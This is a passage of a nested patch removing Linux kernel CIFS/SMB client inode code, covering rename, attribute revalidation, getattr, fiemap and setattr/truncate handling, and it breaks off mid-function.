+-		current_time(inode);
+-
+-rmdir_exit:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int
+-cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
+-	       const char *from_path, struct dentry *to_dentry,
+-	       const char *to_path)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(from_dentry->d_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	int oplock;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	int rc;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->rename)
+-		return -ENOSYS;
+-
+-	/* try path-based rename first */
+-	rc = server->ops->rename(xid, tcon, from_path, to_path, cifs_sb);
+-
+-	/*
+-	 * Don't bother with rename by filehandle unless the source file is
+-	 * busy. Note that cross-directory moves do not work via rename by
+-	 * filehandle against various Windows servers.
+-	 */
+-	if (rc == 0 || rc != -EBUSY)
+-		goto do_rename_exit;
+-
+-	/* Don't fall back to using SMB on SMB 2+ mount */
+-	if (server->vals->protocol_id != 0)
+-		goto do_rename_exit;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	/* open-file renames don't work across directories */
+-	if (to_dentry->d_parent != from_dentry->d_parent)
+-		goto do_rename_exit;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		/* open the file to be renamed -- we need DELETE perms */
+-		.desired_access = DELETE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = from_path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc == 0) {
+-		rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid,
+-				(const char *) to_dentry->d_name.name,
+-				cifs_sb->local_nls, cifs_remap(cifs_sb));
+-		CIFSSMBClose(xid, tcon, fid.netfid);
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-do_rename_exit:
+-	if (rc == 0)
+-		d_move(from_dentry, to_dentry);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-int
+-cifs_rename2(struct user_namespace *mnt_userns, struct inode *source_dir,
+-	     struct dentry *source_dentry, struct inode *target_dir,
+-	     struct dentry *target_dentry, unsigned int flags)
+-{
+-	const char *from_name, *to_name;
+-	void *page1, *page2;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	unsigned int xid;
+-	int rc, tmprc;
+-	int retry_count = 0;
+-	FILE_UNIX_BASIC_INFO *info_buf_source = NULL;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	FILE_UNIX_BASIC_INFO *info_buf_target;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (flags & ~RENAME_NOREPLACE)
+-		return -EINVAL;
+-
+-	cifs_sb = CIFS_SB(source_dir->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	page1 = alloc_dentry_path();
+-	page2 = alloc_dentry_path();
+-	xid = get_xid();
+-
+-	from_name = build_path_from_dentry(source_dentry, page1);
+-	if (IS_ERR(from_name)) {
+-		rc = PTR_ERR(from_name);
+-		goto cifs_rename_exit;
+-	}
+-
+-	to_name = build_path_from_dentry(target_dentry, page2);
+-	if (IS_ERR(to_name)) {
+-		rc = PTR_ERR(to_name);
+-		goto cifs_rename_exit;
+-	}
+-
+-	cifs_close_deferred_file_under_dentry(tcon, from_name);
+-	if (d_inode(target_dentry) != NULL)
+-		cifs_close_deferred_file_under_dentry(tcon, to_name);
+-
+-	rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
+-			    to_name);
+-
+-	if (rc == -EACCES) {
+-		while (retry_count < 3) {
+-			cifs_close_all_deferred_files(tcon);
+-			rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
+-					    to_name);
+-			if (rc != -EACCES)
+-				break;
+-			retry_count++;
+-		}
+-	}
+-
+-	/*
+-	 * No-replace is the natural behavior for CIFS, so skip unlink hacks.
+-	 */
+-	if (flags & RENAME_NOREPLACE)
+-		goto cifs_rename_exit;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (rc == -EEXIST && tcon->unix_ext) {
+-		/*
+-		 * Are src and dst hardlinks of the same inode? We can only
+-		 * tell with unix extensions enabled.
+-		 */
+-		info_buf_source =
+-			kmalloc_array(2, sizeof(FILE_UNIX_BASIC_INFO),
+-					GFP_KERNEL);
+-		if (info_buf_source == NULL) {
+-			rc = -ENOMEM;
+-			goto cifs_rename_exit;
+-		}
+-
+-		info_buf_target = info_buf_source + 1;
+-		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, from_name,
+-					     info_buf_source,
+-					     cifs_sb->local_nls,
+-					     cifs_remap(cifs_sb));
+-		if (tmprc != 0)
+-			goto unlink_target;
+-
+-		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, to_name,
+-					     info_buf_target,
+-					     cifs_sb->local_nls,
+-					     cifs_remap(cifs_sb));
+-
+-		if (tmprc == 0 && (info_buf_source->UniqueId ==
+-				   info_buf_target->UniqueId)) {
+-			/* same file, POSIX says that this is a noop */
+-			rc = 0;
+-			goto cifs_rename_exit;
+-		}
+-	}
+-	/*
+-	 * else ... BB we could add the same check for Windows by
+-	 * checking the UniqueId via FILE_INTERNAL_INFO
+-	 */
+-
+-unlink_target:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	/* Try unlinking the target dentry if it's not negative */
+-	if (d_really_is_positive(target_dentry) && (rc == -EACCES || rc == -EEXIST)) {
+-		if (d_is_dir(target_dentry))
+-			tmprc = cifs_rmdir(target_dir, target_dentry);
+-		else
+-			tmprc = cifs_unlink(target_dir, target_dentry);
+-		if (tmprc)
+-			goto cifs_rename_exit;
+-		rc = cifs_do_rename(xid, source_dentry, from_name,
+-				    target_dentry, to_name);
+-	}
+-
+-	/* force revalidate to go get info when needed */
+-	CIFS_I(source_dir)->time = CIFS_I(target_dir)->time = 0;
+-
+-	source_dir->i_ctime = source_dir->i_mtime = target_dir->i_ctime =
+-		target_dir->i_mtime = current_time(source_dir);
+-
+-cifs_rename_exit:
+-	kfree(info_buf_source);
+-	free_dentry_path(page2);
+-	free_dentry_path(page1);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static bool
+-cifs_dentry_needs_reval(struct dentry *dentry)
+-{
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct cached_fid *cfid = NULL;
+-
+-	if (cifs_i->time == 0)
+-		return true;
+-
+-	if (CIFS_CACHE_READ(cifs_i))
+-		return false;
+-
+-	if (!lookupCacheEnabled)
+-		return true;
+-
+-	if (!open_cached_dir_by_dentry(tcon, dentry->d_parent, &cfid)) {
+-		spin_lock(&cfid->fid_lock);
+-		if (cfid->time && cifs_i->time > cfid->time) {
+-			spin_unlock(&cfid->fid_lock);
+-			close_cached_dir(cfid);
+-			return false;
+-		}
+-		spin_unlock(&cfid->fid_lock);
+-		close_cached_dir(cfid);
+-	}
+-	/*
+-	 * depending on inode type, check if attribute caching is disabled
+-	 * for files or for directories
+-	 */
+-	if (S_ISDIR(inode->i_mode)) {
+-		if (!cifs_sb->ctx->acdirmax)
+-			return true;
+-		if (!time_in_range(jiffies, cifs_i->time,
+-				   cifs_i->time + cifs_sb->ctx->acdirmax))
+-			return true;
+-	} else { /* file */
+-		if (!cifs_sb->ctx->acregmax)
+-			return true;
+-		if (!time_in_range(jiffies, cifs_i->time,
+-				   cifs_i->time + cifs_sb->ctx->acregmax))
+-			return true;
+-	}
+-
+-	/* hardlinked files w/ noserverino get "special" treatment */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) &&
+-	    S_ISREG(inode->i_mode) && inode->i_nlink != 1)
+-		return true;
+-
+-	return false;
+-}
+-
+-/*
+- * Zap the cache. Called when invalid_mapping flag is set.
+- */
+-int
+-cifs_invalidate_mapping(struct inode *inode)
+-{
+-	int rc = 0;
+-
+-	if (inode->i_mapping && inode->i_mapping->nrpages != 0) {
+-		rc = invalidate_inode_pages2(inode->i_mapping);
+-		if (rc)
+-			cifs_dbg(VFS, "%s: Could not invalidate inode %p\n",
+-				 __func__, inode);
+-	}
+-
+-	return rc;
+-}
+-
+-/**
+- * cifs_wait_bit_killable - helper for functions that are sleeping on bit locks
+- *
+- * @key:	currently unused
+- * @mode:	the task state to sleep in
+- */
+-static int
+-cifs_wait_bit_killable(struct wait_bit_key *key, int mode)
+-{
+-	schedule();
+-	if (signal_pending_state(mode, current))
+-		return -ERESTARTSYS;
+-	return 0;
+-}
+-
+-int
+-cifs_revalidate_mapping(struct inode *inode)
+-{
+-	int rc;
+-	unsigned long *flags = &CIFS_I(inode)->flags;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	/* swapfiles are not supposed to be shared */
+-	if (IS_SWAPFILE(inode))
+-		return 0;
+-
+-	rc = wait_on_bit_lock_action(flags, CIFS_INO_LOCK, cifs_wait_bit_killable,
+-				     TASK_KILLABLE|TASK_FREEZABLE_UNSAFE);
+-	if (rc)
+-		return rc;
+-
+-	if (test_and_clear_bit(CIFS_INO_INVALID_MAPPING, flags)) {
+-		/* for cache=singleclient, do not invalidate */
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
+-			goto skip_invalidate;
+-
+-		rc = cifs_invalidate_mapping(inode);
+-		if (rc)
+-			set_bit(CIFS_INO_INVALID_MAPPING, flags);
+-	}
+-
+-skip_invalidate:
+-	clear_bit_unlock(CIFS_INO_LOCK, flags);
+-	smp_mb__after_atomic();
+-	wake_up_bit(flags, CIFS_INO_LOCK);
+-
+-	return rc;
+-}
+-
+-int
+-cifs_zap_mapping(struct inode *inode)
+-{
+-	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(inode)->flags);
+-	return cifs_revalidate_mapping(inode);
+-}
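+-
+-/*
+- * In short, the invalidation protocol above (descriptive sketch):
+- * callers mark the mapping stale with CIFS_INO_INVALID_MAPPING;
+- * cifs_revalidate_mapping() serializes on the CIFS_INO_LOCK bit with a
+- * killable wait, clears the stale bit, drops the page cache, and
+- * re-sets the bit on failure so a later call retries.
+- * cifs_zap_mapping() is simply "mark stale, then revalidate".
+- */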
+-
+-int cifs_revalidate_file_attr(struct file *filp)
+-{
+-	int rc = 0;
+-	struct dentry *dentry = file_dentry(filp);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *) filp->private_data;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (!cifs_dentry_needs_reval(dentry))
+-		return rc;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tlink_tcon(cfile->tlink)->unix_ext)
+-		rc = cifs_get_file_info_unix(filp);
+-	else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		rc = cifs_get_file_info(filp);
+-
+-	return rc;
+-}
+-
+-int cifs_revalidate_dentry_attr(struct dentry *dentry)
+-{
+-	unsigned int xid;
+-	int rc = 0;
+-	struct inode *inode = d_inode(dentry);
+-	struct super_block *sb = dentry->d_sb;
+-	const char *full_path;
+-	void *page;
+-	int count = 0;
+-
+-	if (inode == NULL)
+-		return -ENOENT;
+-
+-	if (!cifs_dentry_needs_reval(dentry))
+-		return rc;
+-
+-	xid = get_xid();
+-
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	cifs_dbg(FYI, "Update attributes: %s inode 0x%p count %d dentry: 0x%p d_time %ld jiffies %ld\n",
+-		 full_path, inode, inode->i_count.counter,
+-		 dentry, cifs_get_time(dentry), jiffies);
+-
+-again:
+-	if (cifs_sb_master_tcon(CIFS_SB(sb))->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&inode, full_path, sb, xid);
+-	else if (cifs_sb_master_tcon(CIFS_SB(sb))->unix_ext)
+-		rc = cifs_get_inode_info_unix(&inode, full_path, sb, xid);
+-	else
+-		rc = cifs_get_inode_info(&inode, full_path, NULL, sb,
+-					 xid, NULL);
+-	if (rc == -EAGAIN && count++ < 10)
+-		goto again;
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-
+-	return rc;
+-}
+-
+-int cifs_revalidate_file(struct file *filp)
+-{
+-	int rc;
+-	struct inode *inode = file_inode(filp);
+-
+-	rc = cifs_revalidate_file_attr(filp);
+-	if (rc)
+-		return rc;
+-
+-	return cifs_revalidate_mapping(inode);
+-}
+-
+-/* revalidate a dentry's inode attributes */
+-int cifs_revalidate_dentry(struct dentry *dentry)
+-{
+-	int rc;
+-	struct inode *inode = d_inode(dentry);
+-
+-	rc = cifs_revalidate_dentry_attr(dentry);
+-	if (rc)
+-		return rc;
+-
+-	return cifs_revalidate_mapping(inode);
+-}
+-
+-int cifs_getattr(struct user_namespace *mnt_userns, const struct path *path,
+-		 struct kstat *stat, u32 request_mask, unsigned int flags)
+-{
+-	struct dentry *dentry = path->dentry;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(dentry->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct inode *inode = d_inode(dentry);
+-	int rc;
+-
+-	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
+-		return -EIO;
+-
+-	/*
+-	 * We need to be sure that all dirty pages are written and the server
+-	 * has the actual ctime, mtime and file length.
+-	 */
+-	if ((request_mask & (STATX_CTIME | STATX_MTIME | STATX_SIZE | STATX_BLOCKS)) &&
+-	    !CIFS_CACHE_READ(CIFS_I(inode)) &&
+-	    inode->i_mapping && inode->i_mapping->nrpages != 0) {
+-		rc = filemap_fdatawait(inode->i_mapping);
+-		if (rc) {
+-			mapping_set_error(inode->i_mapping, rc);
+-			return rc;
+-		}
+-	}
+-
+-	if ((flags & AT_STATX_SYNC_TYPE) == AT_STATX_FORCE_SYNC)
+-		CIFS_I(inode)->time = 0; /* force revalidate */
+-
+-	/*
+-	 * If the caller doesn't require syncing, only sync if
+-	 * necessary (e.g. due to earlier truncate or setattr
+-	 * invalidating the cached metadata)
+-	 */
+-	if (((flags & AT_STATX_SYNC_TYPE) != AT_STATX_DONT_SYNC) ||
+-	    (CIFS_I(inode)->time == 0)) {
+-		rc = cifs_revalidate_dentry_attr(dentry);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	generic_fillattr(&init_user_ns, inode, stat);
+-	stat->blksize = cifs_sb->ctx->bsize;
+-	stat->ino = CIFS_I(inode)->uniqueid;
+-
+-	/* the old CIFS Unix Extensions don't return the create time */
+-	if (CIFS_I(inode)->createtime) {
+-		stat->result_mask |= STATX_BTIME;
+-		stat->btime =
+-		      cifs_NTtimeToUnix(cpu_to_le64(CIFS_I(inode)->createtime));
+-	}
+-
+-	stat->attributes_mask |= (STATX_ATTR_COMPRESSED | STATX_ATTR_ENCRYPTED);
+-	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_COMPRESSED)
+-		stat->attributes |= STATX_ATTR_COMPRESSED;
+-	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_ENCRYPTED)
+-		stat->attributes |= STATX_ATTR_ENCRYPTED;
+-
+-	/*
+-	 * If on a multiuser mount without unix extensions or cifsacl being
+-	 * enabled, and the admin hasn't overridden them, set the ownership
+-	 * to the fsuid/fsgid of the current process.
+-	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER) &&
+-	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
+-	    !tcon->unix_ext) {
+-		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID))
+-			stat->uid = current_fsuid();
+-		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID))
+-			stat->gid = current_fsgid();
+-	}
+-	return 0;
+-}
+-
+-int cifs_fiemap(struct inode *inode, struct fiemap_extent_info *fei, u64 start,
+-		u64 len)
+-{
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_i->netfs.inode.i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifsFileInfo *cfile;
+-	int rc;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	/*
+-	 * We need to be sure that all dirty pages are written as they
+-	 * might fill holes on the server.
+-	 */
+-	if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
+-	    inode->i_mapping->nrpages != 0) {
+-		rc = filemap_fdatawait(inode->i_mapping);
+-		if (rc) {
+-			mapping_set_error(inode->i_mapping, rc);
+-			return rc;
+-		}
+-	}
+-
+-	cfile = find_readable_file(cifs_i, false);
+-	if (cfile == NULL)
+-		return -EINVAL;
+-
+-	if (server->ops->fiemap) {
+-		rc = server->ops->fiemap(tcon, cfile, fei, start, len);
+-		cifsFileInfo_put(cfile);
+-		return rc;
+-	}
+-
+-	cifsFileInfo_put(cfile);
+-	return -ENOTSUPP;
+-}
+-
+-int cifs_truncate_page(struct address_space *mapping, loff_t from)
+-{
+-	pgoff_t index = from >> PAGE_SHIFT;
+-	unsigned offset = from & (PAGE_SIZE - 1);
+-	struct page *page;
+-	int rc = 0;
+-
+-	page = grab_cache_page(mapping, index);
+-	if (!page)
+-		return -ENOMEM;
+-
+-	zero_user_segment(page, offset, PAGE_SIZE);
+-	unlock_page(page);
+-	put_page(page);
+-	return rc;
+-}
+-
+-void cifs_setsize(struct inode *inode, loff_t offset)
+-{
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-
+-	spin_lock(&inode->i_lock);
+-	i_size_write(inode, offset);
+-	spin_unlock(&inode->i_lock);
+-
+-	/* Cached inode must be refreshed on truncate */
+-	cifs_i->time = 0;
+-	truncate_pagecache(inode, offset);
+-}
+-
+-static int
+-cifs_set_file_size(struct inode *inode, struct iattr *attrs,
+-		   unsigned int xid, const char *full_path)
+-{
+-	int rc;
+-	struct cifsFileInfo *open_file;
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon = NULL;
+-	struct TCP_Server_Info *server;
+-
+-	/*
+-	 * To avoid spurious oplock breaks from the server, in the case of
+-	 * inodes that we already have open, avoid doing path-based setting
+-	 * of the file size if we can do it by handle. This keeps our caching
+-	 * token (oplock) and avoids timeouts when the local oplock break
+-	 * takes longer to flush writebehind data than the SMB timeout for
+-	 * the SetPathInfo request would allow.
+-	 */
+-	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
+-	if (open_file) {
+-		tcon = tlink_tcon(open_file->tlink);
+-		server = tcon->ses->server;
+-		if (server->ops->set_file_size)
+-			rc = server->ops->set_file_size(xid, tcon, open_file,
+-							attrs->ia_size, false);
+-		else
+-			rc = -ENOSYS;
+-		cifsFileInfo_put(open_file);
+-		cifs_dbg(FYI, "SetFSize for attrs rc = %d\n", rc);
+-	} else
+-		rc = -EINVAL;
+-
+-	if (!rc)
+-		goto set_size_out;
+-
+-	if (tcon == NULL) {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink))
+-			return PTR_ERR(tlink);
+-		tcon = tlink_tcon(tlink);
+-		server = tcon->ses->server;
+-	}
+-
+-	/*
+-	 * Set file size by pathname rather than by handle either because no
+-	 * valid, writeable file handle for it was found or because there was
+-	 * an error setting it by handle.
+-	 */
+-	if (server->ops->set_path_size)
+-		rc = server->ops->set_path_size(xid, tcon, full_path,
+-						attrs->ia_size, cifs_sb, false);
+-	else
+-		rc = -ENOSYS;
+-	cifs_dbg(FYI, "SetEOF by path (setattrs) rc = %d\n", rc);
+-
+-	if (tlink)
+-		cifs_put_tlink(tlink);
+-
+-set_size_out:
+-	if (rc == 0) {
+-		cifsInode->server_eof = attrs->ia_size;
+-		cifs_setsize(inode, attrs->ia_size);
+-		/*
+-		 * i_blocks is not related to (i_size / i_blksize); instead a
+-		 * 512-byte (2**9) unit is required for calculating the number
+-		 * of blocks. Until we can query the server for the actual
+-		 * allocation size, this is the best estimate we have for the
+-		 * blocks allocated to a file. The block count must be rounded
+-		 * up so that size 1 is not 0 blocks.
+-		 */
+-		inode->i_blocks = (512 - 1 + attrs->ia_size) >> 9;
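+-		/*
+-		 * e.g. (illustrative arithmetic for the rounding above):
+-		 *   ia_size == 0   -> (511  >> 9) = 0 blocks
+-		 *   ia_size == 1   -> (512  >> 9) = 1 block
+-		 *   ia_size == 513 -> (1024 >> 9) = 2 blocks
+-		 */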
+-
+-		/*
+-		 * The man page of truncate says if the size changed,
+-		 * then the st_ctime and st_mtime fields for the file
+-		 * are updated.
+-		 */
+-		attrs->ia_ctime = attrs->ia_mtime = current_time(inode);
+-		attrs->ia_valid |= ATTR_CTIME | ATTR_MTIME;
+-
+-		cifs_truncate_page(inode->i_mapping, inode->i_size);
+-	}
+-
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_setattr_unix(struct dentry *direntry, struct iattr *attrs)
+-{
+-	int rc;
+-	unsigned int xid;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct inode *inode = d_inode(direntry);
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	struct cifs_unix_set_info_args *args = NULL;
+-	struct cifsFileInfo *open_file;
+-
+-	cifs_dbg(FYI, "setattr_unix on file %pd attrs->ia_valid=0x%x\n",
+-		 direntry, attrs->ia_valid);
+-
+-	xid = get_xid();
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
+-		attrs->ia_valid |= ATTR_FORCE;
+-
+-	rc = setattr_prepare(&init_user_ns, direntry, attrs);
+-	if (rc < 0)
+-		goto out;
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	/*
+-	 * Attempt to flush data before changing attributes. We need to do
+-	 * this for ATTR_SIZE and ATTR_MTIME for sure, and if we change the
+-	 * ownership or mode then we may also need to do this. Here, we take
+-	 * the safe way out and just do the flush on all setattr requests. If
+-	 * the flush returns an error, store it to report later and continue.
+-	 *
+-	 * BB: This should be smarter. Why bother flushing pages that
+-	 * will be truncated anyway? Also, should we error out here if
+-	 * the flush returns an error?
+-	 */
+-	rc = filemap_write_and_wait(inode->i_mapping);
+-	if (is_interrupt_error(rc)) {
+-		rc = -ERESTARTSYS;
+-		goto out;
+-	}
+-
+-	mapping_set_error(inode->i_mapping, rc);
+-	rc = 0;
+-
+-	if (attrs->ia_valid & ATTR_SIZE) {
+-		rc = cifs_set_file_size(inode, attrs, xid, full_path);
+-		if (rc != 0)
+-			goto out;
+-	}
+-
+-	/* skip mode change if it's just for clearing setuid/setgid */
+-	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
+-		attrs->ia_valid &= ~ATTR_MODE;
+-
+-	args = kmalloc(sizeof(*args), GFP_KERNEL);
+-	if (args == NULL) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	/* set up the struct */
+-	if (attrs->ia_valid & ATTR_MODE)
+-		args->mode = attrs->ia_mode;
+-	else
+-		args->mode = NO_CHANGE_64;
+-
+-	if (attrs->ia_valid & ATTR_UID)
+-		args->uid = attrs->ia_uid;
+-	else
+-		args->uid = INVALID_UID; /* no change */
+-
+-	if (attrs->ia_valid & ATTR_GID)
+-		args->gid = attrs->ia_gid;
+-	else
+-		args->gid = INVALID_GID; /* no change */
+-
+-	if (attrs->ia_valid & ATTR_ATIME)
+-		args->atime = cifs_UnixTimeToNT(attrs->ia_atime);
+-	else
+-		args->atime = NO_CHANGE_64;
+-
+-	if (attrs->ia_valid & ATTR_MTIME)
+-		args->mtime = cifs_UnixTimeToNT(attrs->ia_mtime);
+-	else
+-		args->mtime = NO_CHANGE_64;
+-
+-	if (attrs->ia_valid & ATTR_CTIME)
+-		args->ctime = cifs_UnixTimeToNT(attrs->ia_ctime);
+-	else
+-		args->ctime = NO_CHANGE_64;
+-
+-	args->device = 0;
+-	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
+-	if (open_file) {
+-		u16 nfid = open_file->fid.netfid;
+-		u32 npid = open_file->pid;
+-		pTcon = tlink_tcon(open_file->tlink);
+-		rc = CIFSSMBUnixSetFileInfo(xid, pTcon, args, nfid, npid);
+-		cifsFileInfo_put(open_file);
+-	} else {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink)) {
+-			rc = PTR_ERR(tlink);
+-			goto out;
+-		}
+-		pTcon = tlink_tcon(tlink);
+-		rc = CIFSSMBUnixSetPathInfo(xid, pTcon, full_path, args,
+-				    cifs_sb->local_nls,
+-				    cifs_remap(cifs_sb));
+-		cifs_put_tlink(tlink);
+-	}
+-
+-	if (rc)
+-		goto out;
+-
+-	if ((attrs->ia_valid & ATTR_SIZE) &&
+-	    attrs->ia_size != i_size_read(inode)) {
+-		truncate_setsize(inode, attrs->ia_size);
+-		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, attrs);
+-	mark_inode_dirty(inode);
+-
+-	/* force revalidate when any of these times are set since some
+-	   of the fs types (eg ext3, fat) do not have fine enough
+-	   time granularity to match the protocol, and we do not have
+-	   a way (yet) to query the server fs's time granularity (and
+-	   whether it rounds times down).
+-	*/
+-	if (attrs->ia_valid & (ATTR_MTIME | ATTR_CTIME))
+-		cifsInode->time = 0;
+-out:
+-	kfree(args);
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_setattr_nounix(struct dentry *direntry, struct iattr *attrs)
+-{
+-	unsigned int xid;
+-	kuid_t uid = INVALID_UID;
+-	kgid_t gid = INVALID_GID;
+-	struct inode *inode = d_inode(direntry);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifsFileInfo *wfile;
+-	struct cifs_tcon *tcon;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	int rc = -EACCES;
+-	__u32 dosattr = 0;
+-	__u64 mode = NO_CHANGE_64;
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "setattr on file %pd attrs->ia_valid 0x%x\n",
+-		 direntry, attrs->ia_valid);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
+-		attrs->ia_valid |= ATTR_FORCE;
+-
+-	rc = setattr_prepare(&init_user_ns, direntry, attrs);
+-	if (rc < 0)
+-		goto cifs_setattr_exit;
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto cifs_setattr_exit;
+-	}
+-
+-	/*
+-	 * Attempt to flush data before changing attributes. We need to do
+-	 * this for ATTR_SIZE and ATTR_MTIME. If the flush of the data
+-	 * returns an error, store it to report later and continue.
+-	 *
+-	 * BB: This should be smarter. Why bother flushing pages that
+-	 * will be truncated anyway? Also, should we error out here if
+-	 * the flush returns an error? Do we need to check for the
+-	 * ATTR_MTIME_SET flag?
+-	 */
+-	if (attrs->ia_valid & (ATTR_MTIME | ATTR_SIZE | ATTR_CTIME)) {
+-		rc = filemap_write_and_wait(inode->i_mapping);
+-		if (is_interrupt_error(rc)) {
+-			rc = -ERESTARTSYS;
+-			goto cifs_setattr_exit;
+-		}
+-		mapping_set_error(inode->i_mapping, rc);
+-	}
+-
+-	rc = 0;
+-
+-	if ((attrs->ia_valid & ATTR_MTIME) &&
+-	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
+-		rc = cifs_get_writable_file(cifsInode, FIND_WR_ANY, &wfile);
+-		if (!rc) {
+-			tcon = tlink_tcon(wfile->tlink);
+-			rc = tcon->ses->server->ops->flush(xid, tcon, &wfile->fid);
+-			cifsFileInfo_put(wfile);
+-			if (rc)
+-				goto cifs_setattr_exit;
+-		} else if (rc != -EBADF)
